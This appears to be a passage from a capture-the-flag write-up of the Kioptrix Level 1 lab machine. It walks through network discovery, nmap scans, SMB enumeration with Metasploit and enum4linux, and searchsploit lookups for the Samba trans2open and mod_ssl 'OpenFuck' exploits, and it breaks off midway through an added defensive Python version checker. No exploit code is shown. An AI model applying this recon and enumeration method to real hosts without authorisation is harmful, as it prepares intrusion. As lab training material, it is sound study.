Kioptrix Level 1

mrZud0k0rn
14 min read · Sep 19, 2020


Today we’re going to crack our first machine along our journey: Kioptrix Level 1, which can be downloaded here.

This was supposed to be an easy box, so let’s start.

First, I downloaded the machine image and ran it in my VM software. Let’s discover the machine’s IP by issuing an arp-scan command.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrixlvl1]
└─$ sudo arp-scan 192.168.1.0/24
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:26:ae, IPv4: 192.168.1.9
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.104 00:0c:29:52:c3:4f VMware, Inc.


9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.073 seconds (123.49 hosts/sec). 9 responded

Now that we have our target IP, I’d like to run threader3000 by The Mayor to scan for open ports.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrixlvl1]
└─$ sudo threader3000
[sudo] password for kali:
------------------------------------------------------------
Threader 3000 - Multi-threaded Port Scanner
Version 1.0.7
A project by The Mayor
------------------------------------------------------------
Enter your target IP address or URL here:
192.168.1.104
------------------------------------------------------------
Scanning target 192.168.1.104
Time started: 2020-09-01 10:44:13.263841
------------------------------------------------------------
Port 22 is open
Port 80 is open
Port 111 is open
Port 139 is open
Port 443 is open
Port 1024 is open
Port scan completed in 0:00:13.666572
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p22,80,111,139,443,1024 -sV -sC -T4 -Pn -oA 192.168.1.104 192.168.1.104
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------

Conveniently, Threader3000 already suggests the nmap command and flags we need to detect the service versions (-sV) and run the default scripts (-sC) that point at possible vulnerabilities. Let’s run nmap now.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrixlvl1]
└─$ sudo nmap -p22,80,111,139,443,1024 -sV -sC -T4 -Pn -oA nmap/kioptrix1 192.168.1.104
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 10:46 EDT
Nmap scan report for 192.168.1.104 (192.168.1.104)
Host is up (0.00037s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-09-01T14:49:47+00:00; +1m50s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:52:C3:4F (VMware)
MAC Address: 00:0C:29:52:C3:4F (VMware)

Host script results:
|_clock-skew: 1m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.82 seconds

Okay, we got the following ports and service versions.

  1. Port 22
    → OpenSSH 2.9p2 (protocol 1.99)
  2. Port 80/443
    → Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
  3. Port 139/445
    → Samba smbd (workgroup: MYGROUP)
  4. Port 111/1024
    → rpcbind 2 (RPC #100000), status 1 (RPC #100024)
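The nmap output carries more than version strings: the sslv2, sshv1 and http-methods script results are exactly the findings a defender would want pulled out automatically rather than read by eye. As an added example (my code, not from the original post and not part of nmap or Threader3000), here is a small Python parser for nmap’s normal-output layout that extracts the port table and flags the weak-protocol indicators seen on this host: SSH protocol 1, SSLv2, export-grade SSLv2 ciphers and the TRACE method. The SAMPLE_NMAP text is constructed to mirror the scan above, laid out one line per port as nmap actually prints it.

```python
import re

# Constructed sample in the layout nmap -sV -sC prints (one line per port, script
# output indented with '|'), mirroring the scan of the lab host in the write-up.
SAMPLE_NMAP = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:52:C3:4F (VMware)
"""

# A port line: "<port>/<proto>  <state>  <service>  <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Return one dict per port: port, proto, state, service, version, scripts.

    Script output lines ('|' / '|_' prefixed) are attached to the port that
    precedes them, with the prefix and indentation stripped.
    """
    ports = []
    for line in text.splitlines():
        match = PORT_RE.match(line)
        if match:
            ports.append({
                "port": int(match.group(1)),
                "proto": match.group(2),
                "state": match.group(3),
                "service": match.group(4),
                "version": match.group(5).strip(),
                "scripts": [],
            })
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports


def weak_findings(ports):
    """Flag legacy-protocol indicators that the NSE scripts report."""
    findings = []
    for entry in ports:
        tag = f"{entry['port']}/{entry['proto']}"
        scripts = entry["scripts"]
        if any("Server supports SSHv1" in line for line in scripts):
            findings.append((tag, "SSH protocol 1 enabled"))
        if any(line == "SSLv2 supported" for line in scripts):
            findings.append((tag, "SSLv2 enabled"))
        for line in scripts:
            # Export-grade suites (40-bit) are listed by name under the sslv2 script.
            if line.startswith("SSL2_") and "EXPORT" in line:
                findings.append((tag, f"export-grade cipher {line}"))
            if line.startswith("Potentially risky methods") and "TRACE" in line:
                findings.append((tag, "HTTP TRACE enabled"))
    return findings


if __name__ == "__main__":
    for tag, issue in weak_findings(parse_nmap(SAMPLE_NMAP)):
        print(f"{tag:10} {issue}")
```

Running it on the sample prints four findings (SSHv1 on 22/tcp, TRACE on 80/tcp, SSLv2 and one export cipher on 443/tcp); pointing it at a real `-oN` file from the `-oA` output set gives the same list for any host.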

We now begin the ENUMERATION of our scanned ports. As part of my methodology, I enumerate ALL scanned ports first before deciding which exploit or attack to use.

ENUMERATION

  1. Port 139/445

Scanning for the Samba version using Metasploit

msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.104
rhosts => 192.168.1.104
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.1.104:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.1.104:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

NMBLOOKUP

┌──(kali㉿kali)-[~]
└─$ sudo nmblookup -A 192.168.1.104
Looking up status of 192.168.1.104
        KIOPTRIX        <00> -         B <ACTIVE>
        KIOPTRIX        <03> -         B <ACTIVE>
        KIOPTRIX        <20> -         B <ACTIVE>
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>
        MYGROUP         <00> - <GROUP> B <ACTIVE>
        MYGROUP         <1d> -         B <ACTIVE>
        MYGROUP         <1e> - <GROUP> B <ACTIVE>

        MAC Address = 00-00-00-00-00-00

Listing shared folders with nmap’s smb-enum-shares script

┌──(kali㉿kali)-[~]
└─$ nmap --script smb-enum-shares -p 139 192.168.1.104
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 11:35 EDT
Nmap scan report for 192.168.1.104 (192.168.1.104)
Host is up (0.00061s latency).

PORT STATE SERVICE
139/tcp open netbios-ssn

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

SMBMAP

┌──(kali㉿kali)-[~]
└─$ sudo smbmap -H 192.168.1.104
[!] 445 not open on 192.168.1.104….

SMBCLIENT

┌──(kali㉿kali)-[~]
└─$ sudo smbclient -L \\\\192.168.1.104\\
Server does not support EXTENDED_SECURITY but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
Anonymous login successful
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       IPC Service (Samba Server)
        ADMIN$          IPC       IPC Service (Samba Server)
Reconnecting with SMB1 for workgroup listing.
Server does not support EXTENDED_SECURITY but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
Anonymous login successful

        Server               Comment
        ---------            -------
        KIOPTRIX             Samba Server

        Workgroup            Master
        ---------            -------
        MYGROUP              KIOPTRIX

Checking for null sessions

┌──(kali㉿kali)-[~]
└─$ sudo smbclient \\\\192.168.1.104\\ADMIN$
Server does not support EXTENDED_SECURITY but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
Anonymous login successful
Enter WORKGROUP\root's password:
tree connect failed: NT_STATUS_WRONG_PASSWORD

Enum4Linux

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrixlvl1]
└─$ sudo enum4linux -a 192.168.1.104
[sudo] password for kali:
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 3 11:40:58 2020

==========================
| Target Information |
==========================
Target ........... 192.168.1.104
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=====================================================
| Enumerating Workgroup/Domain on 192.168.1.104 |
=====================================================
[+] Got domain/workgroup name: MYGROUP

=============================================
| Nbtstat Information for 192.168.1.104 |
=============================================
Looking up status of 192.168.1.104
        KIOPTRIX        <00> -         B <ACTIVE>  Workstation Service
        KIOPTRIX        <03> -         B <ACTIVE>  Messenger Service
        KIOPTRIX        <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        MYGROUP         <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        MYGROUP         <1d> -         B <ACTIVE>  Master Browser
        MYGROUP         <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

======================================
| Session Check on 192.168.1.104 |
======================================
[+] Server 192.168.1.104 allows sessions using username '', password ''

============================================
| Getting domain SID for 192.168.1.104 |
============================================
Domain Name: MYGROUP
Domain Sid: (NULL SID)
[+] Can’t determine if host is part of domain or part of a workgroup

=======================================
| OS information on 192.168.1.104 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.1.104 from smbclient:
[+] Got OS info for 192.168.1.104 from srvinfo:
KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
platform_id : 500
os version : 4.5
server type : 0x9a03

==============================
| Users on 192.168.1.104 |
==============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

==========================================
| Share Enumeration on 192.168.1.104 |
==========================================

        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       IPC Service (Samba Server)
        ADMIN$          IPC       IPC Service (Samba Server)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------
        KIOPTRIX             Samba Server

        Workgroup            Master
        ---------            -------
        MYGROUP              KIOPTRIX

[+] Attempting to map shares on 192.168.1.104
//192.168.1.104/IPC$ [E] Can’t understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.104/ADMIN$ [E] Can’t understand response:
tree connect failed: NT_STATUS_WRONG_PASSWORD

=====================================================
| Password Policy Information for 192.168.1.104 |
=====================================================
[E] Unexpected error from polenum:

[+] Attaching to 192.168.1.104 using a NULL share

[+] Trying protocol 139/SMB…

[!] Protocol failed: SMB SessionError: 0x5

[+] Trying protocol 445/SMB…

[!] Protocol failed: [Errno Connection error (192.168.1.104:445)] [Errno 111] Connection refused

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0

===============================
| Groups on 192.168.1.104 |
===============================

[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Power Users] rid:[0x223]
group:[Account Operators] rid:[0x224]
group:[System Operators] rid:[0x225]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]

[+] Getting builtin group memberships:
Group ‘Print Operators’ (RID: 550) has member: Couldn’t find group Print Operators
Group ‘Backup Operators’ (RID: 551) has member: Couldn’t find group Backup Operators
Group ‘Account Operators’ (RID: 548) has member: Couldn’t find group Account Operators
Group ‘Power Users’ (RID: 547) has member: Couldn’t find group Power Users
Group ‘Guests’ (RID: 546) has member: Couldn’t find group Guests
Group ‘Replicator’ (RID: 552) has member: Couldn’t find group Replicator
Group ‘Users’ (RID: 545) has member: Couldn’t find group Users
Group ‘System Operators’ (RID: 549) has member: Couldn’t find group System Operators
Group ‘Administrators’ (RID: 544) has member: Couldn’t find group Administrators

[+] Getting local groups:
group:[sys] rid:[0x3ef]
group:[tty] rid:[0x3f3]
group:[disk] rid:[0x3f5]
group:[mem] rid:[0x3f9]
group:[kmem] rid:[0x3fb]
group:[wheel] rid:[0x3fd]
group:[man] rid:[0x407]
group:[dip] rid:[0x439]
group:[lock] rid:[0x455]
group:[users] rid:[0x4b1]
group:[slocate] rid:[0x413]
group:[floppy] rid:[0x40f]
group:[utmp] rid:[0x415]

[+] Getting local group memberships:

[+] Getting domain groups:
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]

[+] Getting domain group memberships:
Group ‘Domain Admins’ (RID: 512) has member: Couldn’t find group Domain Admins
Group ‘Domain Users’ (RID: 513) has member: Couldn’t find group Domain Users

========================================================================
| Users on 192.168.1.104 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-5-21-4157223341-3243572438-1405127623
[+] Enumerating users using SID S-1-5-21-4157223341-3243572438-1405127623 and logon username '', password ''
S-1-5-21-4157223341-3243572438-1405127623-500 KIOPTRIX\ (0)
S-1-5-21-4157223341-3243572438-1405127623-501 KIOPTRIX\ (0)
S-1-5-21-4157223341-3243572438-1405127623-502 KIOPTRIX\unix_group.2147483399 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-503 KIOPTRIX\unix_group.2147483399 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-504 KIOPTRIX\unix_group.2147483400 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-505 KIOPTRIX\unix_group.2147483400 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-506 KIOPTRIX\unix_group.2147483401 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-507 KIOPTRIX\unix_group.2147483401 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-508 KIOPTRIX\unix_group.2147483402 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-509 KIOPTRIX\unix_group.2147483402 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-510 KIOPTRIX\unix_group.2147483403 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-511 KIOPTRIX\unix_group.2147483403 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-512 KIOPTRIX\Domain Admins (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-513 KIOPTRIX\Domain Users (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-514 KIOPTRIX\Domain Guests (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-515 KIOPTRIX\unix_group.2147483405 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-516 KIOPTRIX\unix_group.2147483406 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-517 KIOPTRIX\unix_group.2147483406 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-518 KIOPTRIX\unix_group.2147483407 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-519 KIOPTRIX\unix_group.2147483407 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-520 KIOPTRIX\unix_group.2147483408 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-521 KIOPTRIX\unix_group.2147483408 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-522 KIOPTRIX\unix_group.2147483409 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-523 KIOPTRIX\unix_group.2147483409 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-524 KIOPTRIX\unix_group.2147483410 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-525 KIOPTRIX\unix_group.2147483410 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-526 KIOPTRIX\unix_group.2147483411 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-527 KIOPTRIX\unix_group.2147483411 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-528 KIOPTRIX\unix_group.2147483412 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-529 KIOPTRIX\unix_group.2147483412 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-530 KIOPTRIX\unix_group.2147483413 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-531 KIOPTRIX\unix_group.2147483413 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-532 KIOPTRIX\unix_group.2147483414 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-533 KIOPTRIX\unix_group.2147483414 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-534 KIOPTRIX\unix_group.2147483415 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-535 KIOPTRIX\unix_group.2147483415 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-536 KIOPTRIX\unix_group.2147483416 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-537 KIOPTRIX\unix_group.2147483416 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-538 KIOPTRIX\unix_group.2147483417 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-539 KIOPTRIX\unix_group.2147483417 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-540 KIOPTRIX\unix_group.2147483418 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-541 KIOPTRIX\unix_group.2147483418 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-542 KIOPTRIX\unix_group.2147483419 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-543 KIOPTRIX\unix_group.2147483419 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-544 KIOPTRIX\unix_group.2147483420 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-545 KIOPTRIX\unix_group.2147483420 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-546 KIOPTRIX\unix_group.2147483421 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-547 KIOPTRIX\unix_group.2147483421 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-548 KIOPTRIX\unix_group.2147483422 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-549 KIOPTRIX\unix_group.2147483422 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-550 KIOPTRIX\unix_group.2147483423 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1000 KIOPTRIX\root (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1001 KIOPTRIX\root (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1002 KIOPTRIX\bin (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1003 KIOPTRIX\bin (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1004 KIOPTRIX\daemon (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1005 KIOPTRIX\daemon (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1006 KIOPTRIX\adm (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1007 KIOPTRIX\sys (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1008 KIOPTRIX\lp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1009 KIOPTRIX\adm (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1010 KIOPTRIX\sync (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1011 KIOPTRIX\tty (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1012 KIOPTRIX\shutdown (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1013 KIOPTRIX\disk (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1014 KIOPTRIX\halt (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1015 KIOPTRIX\lp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1016 KIOPTRIX\mail (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1017 KIOPTRIX\mem (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1018 KIOPTRIX\news (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1019 KIOPTRIX\kmem (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1020 KIOPTRIX\uucp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1021 KIOPTRIX\wheel (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1022 KIOPTRIX\operator (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1023 KIOPTRIX\unix_group.11 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1024 KIOPTRIX\games (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1025 KIOPTRIX\mail (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1026 KIOPTRIX\gopher (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1027 KIOPTRIX\news (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1028 KIOPTRIX\ftp (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1029 KIOPTRIX\uucp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1030 KIOPTRIX\unix_user.15 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1031 KIOPTRIX\man (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1032 KIOPTRIX\unix_user.16 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1033 KIOPTRIX\unix_group.16 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1034 KIOPTRIX\unix_user.17 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1035 KIOPTRIX\unix_group.17 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1036 KIOPTRIX\unix_user.18 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1037 KIOPTRIX\unix_group.18 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1038 KIOPTRIX\unix_user.19 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1039 KIOPTRIX\floppy (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1040 KIOPTRIX\unix_user.20 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1041 KIOPTRIX\games (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1042 KIOPTRIX\unix_user.21 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1043 KIOPTRIX\slocate (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1044 KIOPTRIX\unix_user.22 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1045 KIOPTRIX\utmp (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1046 KIOPTRIX\squid (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1047 KIOPTRIX\squid (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1048 KIOPTRIX\unix_user.24 (Local User)
S-1-5-21-4157223341-3243572438-1405127623-1049 KIOPTRIX\unix_group.24 (Local Group)
S-1-5-21-4157223341-3243572438-1405127623-1050 KIOPTRIX\unix_user.25 (Local User)

==============================================
| Getting printer info for 192.168.1.104 |
==============================================
No printers returned.

enum4linux complete on Thu Sep 3 11:41:06 2020

Okay, we now have a couple of pieces of information that keep us from hitting a dead end yet: we have the Samba version, which we can google, and we know that null sessions or anonymous login are not permitted.

Further enumeration by “googling” the service version shows that the SMB version Unix (Samba 2.2.1a) is vulnerable to the “trans2open” attack. Conveniently for us, the exploit is available in Metasploit. From here, let’s enumerate the other ports.

2. Port 80/443

We can do another Google search since we already have the service version. This brings us to the “OpenFuck” exploit, and we find that it is also available on exploit-db, so we can get a copy of it with searchsploit on our Kali machine.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrixlvl1]
└─$ searchsploit openfuck
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow        | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)  | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)  | unix/remote/47080.c
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

We can read and edit these files according to our needs, then compile and run them. Right now we already have two possible attack vectors; this is the fun part of enumeration. :)
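Both findings so far came from comparing a banner against a known-bad version range: mod_ssl 2.8.4 is below the 2.8.7 in the searchsploit title, and Samba 2.2.1a sits in the 2.2.x series that the trans2open module targets. Version strings such as 2.2.1a, 2.9p2 and 0.9.6b do not compare correctly as plain strings, which is the usual reason a patch-level check in an inventory script gives a wrong answer. As an added example (my code, not the author’s and not part of any tool named here), the following comparator splits a version into numeric and letter components and applies rules built only from the thresholds this page gives. The banners are constructed from the scan output above; the Samba line is assembled from the smb_version result, because the nmap banner omitted the number.

```python
import re

# Constructed banners mirroring the scan output; the Samba version comes from
# the Metasploit smb_version result rather than the nmap banner.
SAMPLE_BANNERS = {
    "22/tcp": "OpenSSH 2.9p2 (protocol 1.99)",
    "80/tcp": "Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)",
    "139/tcp": "Samba 2.2.1a (workgroup: MYGROUP)",
}

# Rules built only from what the write-up states: searchsploit lists the
# mod_ssl overflow as "mod_ssl < 2.8.7", and the Metasploit target is "Samba 2.2.x".
RULES = [
    {"name": "mod_ssl", "pattern": r"mod_ssl/([\w.]+)", "fixed_in": "2.8.7"},
    {"name": "Samba", "pattern": r"Samba (\d[\w.]*)", "affected_series": "2.2"},
]

_TOKEN = re.compile(r"\d+|[A-Za-z]+")


def parse_version(text):
    """Turn '2.2.1a', '2.9p2' or '0.9.6b' into a tuple that sorts correctly.

    Numeric runs compare as integers.  A letter run is tagged so that it sorts
    below any number in the same position ('2.9p2' < '2.9.9'), while a letter
    suffix still sorts above the bare release ('2.2.8' < '2.2.8a').
    """
    key = []
    for token in _TOKEN.findall(text):
        if token.isdigit():
            key.append((1, int(token)))
        else:
            key.append((0, token.lower()))
    return tuple(key)


def is_below(version, fixed_in):
    """True when `version` is older than the release that carries the fix."""
    return parse_version(version) < parse_version(fixed_in)


def in_series(version, series):
    """True when `version` shares the major.minor of `series` (e.g. '2.2')."""
    want = parse_version(series)
    return parse_version(version)[:len(want)] == want


def check_banner(banner):
    """Return the list of rule matches for one service banner."""
    findings = []
    for rule in RULES:
        match = re.search(rule["pattern"], banner)
        if not match:
            continue
        version = match.group(1)
        if "fixed_in" in rule and is_below(version, rule["fixed_in"]):
            findings.append(f"{rule['name']} {version} is below fixed release {rule['fixed_in']}")
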